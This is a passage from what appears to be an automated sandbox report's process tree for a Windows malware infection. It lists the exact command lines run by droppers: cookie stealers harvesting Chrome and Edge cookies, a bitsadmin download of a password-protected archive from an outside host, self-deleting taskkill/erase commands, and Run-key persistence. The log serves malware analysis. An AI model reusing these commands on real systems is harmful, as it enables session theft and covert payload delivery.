                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:4848
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                        8⤵
                                        • Executes dropped EXE
                                        PID:4852
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:5364
                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                          8⤵
                                            PID:5864
                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          • Drops file in Program Files directory
                                          PID:640
                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:1700
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                              PID:5512
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:4396
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:4164
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                  PID:5952
                                            • C:\Users\Admin\Documents\Nl5SZdHttAG_aJqcs1Y741hW.exe
                                              "C:\Users\Admin\Documents\Nl5SZdHttAG_aJqcs1Y741hW.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:5084
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 656
                                                7⤵
                                                • Program crash
                                                PID:4244
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 668
                                                7⤵
                                                • Program crash
                                                PID:1424
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 672
                                                7⤵
                                                • Program crash
                                                PID:4756
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 680
                                                7⤵
                                                • Program crash
                                                PID:4720
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1120
                                                7⤵
                                                • Program crash
                                                PID:5624
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1108
                                                7⤵
                                                • Program crash
                                                PID:5768
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1228
                                                7⤵
                                                • Program crash
                                                PID:5928
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1288
                                                7⤵
                                                • Program crash
                                                PID:4228
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "Nl5SZdHttAG_aJqcs1Y741hW.exe" /f & erase "C:\Users\Admin\Documents\Nl5SZdHttAG_aJqcs1Y741hW.exe" & exit
                                                7⤵
                                                  PID:4720
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im "Nl5SZdHttAG_aJqcs1Y741hW.exe" /f
                                                    8⤵
                                                    • Kills process with taskkill
                                                    PID:5288
                                              • C:\Users\Admin\Documents\wVOmrTMKSshm8e6i0QLtV65I.exe
                                                "C:\Users\Admin\Documents\wVOmrTMKSshm8e6i0QLtV65I.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5060
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  7⤵
                                                    PID:6132
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      8⤵
                                                      • Kills process with taskkill
                                                      PID:6060
                                                • C:\Users\Admin\Documents\OHSDuCyx1pRFBuIFB8AYHRVk.exe
                                                  "C:\Users\Admin\Documents\OHSDuCyx1pRFBuIFB8AYHRVk.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5052
                                                • C:\Users\Admin\Documents\vjueZciHhtBVsVPaSyP6SMQu.exe
                                                  "C:\Users\Admin\Documents\vjueZciHhtBVsVPaSyP6SMQu.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:5044
                                                • C:\Users\Admin\Documents\5mXRrzDoiDXWvZW6L48mcGmH.exe
                                                  "C:\Users\Admin\Documents\5mXRrzDoiDXWvZW6L48mcGmH.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:5036
                                                  • C:\Users\Admin\AppData\Roaming\6405717.exe
                                                    "C:\Users\Admin\AppData\Roaming\6405717.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:416
                                                • C:\Users\Admin\Documents\EU_F4NGsk1EB8LAKdBwgVoif.exe
                                                  "C:\Users\Admin\Documents\EU_F4NGsk1EB8LAKdBwgVoif.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Checks processor information in registry
                                                  PID:5028
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im EU_F4NGsk1EB8LAKdBwgVoif.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\EU_F4NGsk1EB8LAKdBwgVoif.exe" & del C:\ProgramData\*.dll & exit
                                                    7⤵
                                                      PID:5140
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:5512
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im EU_F4NGsk1EB8LAKdBwgVoif.exe /f
                                                        8⤵
                                                        • Kills process with taskkill
                                                        PID:4124
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 6
                                                        8⤵
                                                        • Delays execution with timeout.exe
                                                        PID:2660
                                                  • C:\Users\Admin\Documents\ChZHp3wr7UzECxlpHMSQmKvC.exe
                                                    "C:\Users\Admin\Documents\ChZHp3wr7UzECxlpHMSQmKvC.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:5020
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4296
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:5540
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                        PID:200
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:6604
                                                      • C:\Users\Admin\Documents\lObEA1YTIfw2ddu7Ncly7H4F.exe
                                                        "C:\Users\Admin\Documents\lObEA1YTIfw2ddu7Ncly7H4F.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:5004
                                                        • C:\Users\Admin\Documents\lObEA1YTIfw2ddu7Ncly7H4F.exe
                                                          C:\Users\Admin\Documents\lObEA1YTIfw2ddu7Ncly7H4F.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5524
                                                      • C:\Users\Admin\Documents\IEzDE_WbKObRiMmq4IXkrgGC.exe
                                                        "C:\Users\Admin\Documents\IEzDE_WbKObRiMmq4IXkrgGC.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:4992
                                                      • C:\Users\Admin\Documents\C0UfjZFmtt_cPJNXmUYgVAbb.exe
                                                        "C:\Users\Admin\Documents\C0UfjZFmtt_cPJNXmUYgVAbb.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4980
                                                        • C:\Users\Admin\Documents\C0UfjZFmtt_cPJNXmUYgVAbb.exe
                                                          C:\Users\Admin\Documents\C0UfjZFmtt_cPJNXmUYgVAbb.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Checks processor information in registry
                                                          • Modifies registry class
                                                          PID:3376
                                                      • C:\Users\Admin\Documents\CsviL2Ok7WDOXfWrMbCFo9WD.exe
                                                        "C:\Users\Admin\Documents\CsviL2Ok7WDOXfWrMbCFo9WD.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4972
                                                      • C:\Users\Admin\Documents\PA5ZZ1PBkmKOFBm79IXOrR7k.exe
                                                        "C:\Users\Admin\Documents\PA5ZZ1PBkmKOFBm79IXOrR7k.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        PID:4192
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:4168
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:3888
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:6200
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:6308
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:6456
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:6696
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Checks for any installed AV software in registry
                                                                      PID:3940
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                      7⤵
                                                                      • Download via BitsAdmin
                                                                      PID:3372
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQLV9quaGdLErsKh -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:1580
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfsY50a76TFlsHmZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      7⤵
                                                                        PID:5676
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:3336
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:4160
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5180
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:2596
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:4304
                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                                  7⤵
                                                                                    PID:5408
                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                                      8⤵
                                                                                      • Drops file in System32 directory
                                                                                      PID:5660
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:6704
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6024
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:5272
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:5584
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa39B0.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:5296
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        7⤵
                                                                                          PID:6236
                                                                                      • C:\Users\Admin\Documents\sXAgqWakYhCLnMTiwJy0c5j8.exe
                                                                                        "C:\Users\Admin\Documents\sXAgqWakYhCLnMTiwJy0c5j8.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1008
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "sXAgqWakYhCLnMTiwJy0c5j8.exe" /f & erase "C:\Users\Admin\Documents\sXAgqWakYhCLnMTiwJy0c5j8.exe" & exit
                                                                                          7⤵
                                                                                          • Loads dropped DLL
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3512
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /im "sXAgqWakYhCLnMTiwJy0c5j8.exe" /f
                                                                                            8⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:4888
                                                                                      • C:\Users\Admin\Documents\s34442BciEjbjqmMwjodchEb.exe
                                                                                        "C:\Users\Admin\Documents\s34442BciEjbjqmMwjodchEb.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5000
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5632
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6044
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5148
                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                          C:\Windows\system32\WerFault.exe -u -p 5000 -s 1556
                                                                                          7⤵
                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                          • Program crash
                                                                                          PID:4776
                                                                                      • C:\Users\Admin\Documents\iTt0wz6RS4tpY8BiGhL4Ji_i.exe
                                                                                        "C:\Users\Admin\Documents\iTt0wz6RS4tpY8BiGhL4Ji_i.exe"
                                                                                        6⤵
                                                                                          PID:3212
                                                                                          • C:\Users\Admin\Documents\iTt0wz6RS4tpY8BiGhL4Ji_i.exe
                                                                                            "{path}"
                                                                                            7⤵
                                                                                              PID:5624
                                                                                            • C:\Users\Admin\Documents\iTt0wz6RS4tpY8BiGhL4Ji_i.exe
                                                                                              "{path}"
                                                                                              7⤵
                                                                                                PID:5128
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im iTt0wz6RS4tpY8BiGhL4Ji_i.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\iTt0wz6RS4tpY8BiGhL4Ji_i.exe" & del C:\ProgramData\*.dll & exit
                                                                                                  8⤵
                                                                                                    PID:6908
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /im iTt0wz6RS4tpY8BiGhL4Ji_i.exe /f
                                                                                                      9⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:7100
                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                      timeout /t 6
                                                                                                      9⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:5116
                                                                                              • C:\Users\Admin\Documents\ajxUGcpvRqSp5shRmuNBzF7u.exe
                                                                                                "C:\Users\Admin\Documents\ajxUGcpvRqSp5shRmuNBzF7u.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4732
                                                                                                • C:\Users\Admin\Documents\ajxUGcpvRqSp5shRmuNBzF7u.exe
                                                                                                  "C:\Users\Admin\Documents\ajxUGcpvRqSp5shRmuNBzF7u.exe"
                                                                                                  7⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Modifies system certificate store
                                                                                                  PID:4856
                                                                                              • C:\Users\Admin\Documents\CELQtigGn3OnBIgHWu81LzrS.exe
                                                                                                "C:\Users\Admin\Documents\CELQtigGn3OnBIgHWu81LzrS.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4372
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 660
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:4888
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 672
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:2940
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 676
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:5268
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 816
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:5452
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1080
                                                                                                  7⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  • Program crash
                                                                                                  PID:5784
                                                                                              • C:\Users\Admin\Documents\MFx4KKVPeWZ4JJNPGP2irgfh.exe
                                                                                                "C:\Users\Admin\Documents\MFx4KKVPeWZ4JJNPGP2irgfh.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:4908
                                                                                              • C:\Users\Admin\Documents\Eqf1Gxn9_BeynJPK5JmDWLEN.exe
                                                                                                "C:\Users\Admin\Documents\Eqf1Gxn9_BeynJPK5JmDWLEN.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:204
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-J7OR6.tmp\Eqf1Gxn9_BeynJPK5JmDWLEN.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-J7OR6.tmp\Eqf1Gxn9_BeynJPK5JmDWLEN.tmp" /SL5="$A0034,138429,56832,C:\Users\Admin\Documents\Eqf1Gxn9_BeynJPK5JmDWLEN.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:4640
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-57E7Q.tmp\Setup.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-57E7Q.tmp\Setup.exe" /Verysilent
                                                                                                    8⤵
                                                                                                      PID:6024
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks processor information in registry
                                                                                                        PID:5304
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                                                          10⤵
                                                                                                            PID:6532
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im GameBox64bit.exe /f
                                                                                                              11⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6860
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout /t 6
                                                                                                              11⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:6940
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5380
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                            10⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5652
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                          9⤵
                                                                                                            PID:5344
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              10⤵
                                                                                                                PID:6632
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                10⤵
                                                                                                                  PID:6756
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                9⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5268
                                                                                                                • C:\Users\Admin\AppData\Roaming\1094820.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\1094820.exe"
                                                                                                                  10⤵
                                                                                                                    PID:5752
                                                                                                                  • C:\Users\Admin\AppData\Roaming\3686329.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\3686329.exe"
                                                                                                                    10⤵
                                                                                                                    • Adds Run key to start application
                                                                                                                    PID:5656
                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                      11⤵
                                                                                                                        PID:2000
                                                                                                                    • C:\Users\Admin\AppData\Roaming\3241203.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\3241203.exe"
                                                                                                                      10⤵
                                                                                                                        PID:5216
                                                                                                                      • C:\Users\Admin\AppData\Roaming\7227995.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\7227995.exe"
                                                                                                                        10⤵
                                                                                                                          PID:5768
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                        9⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Enumerates connected drives
                                                                                                                        • Modifies system certificate store
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        PID:4748
                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
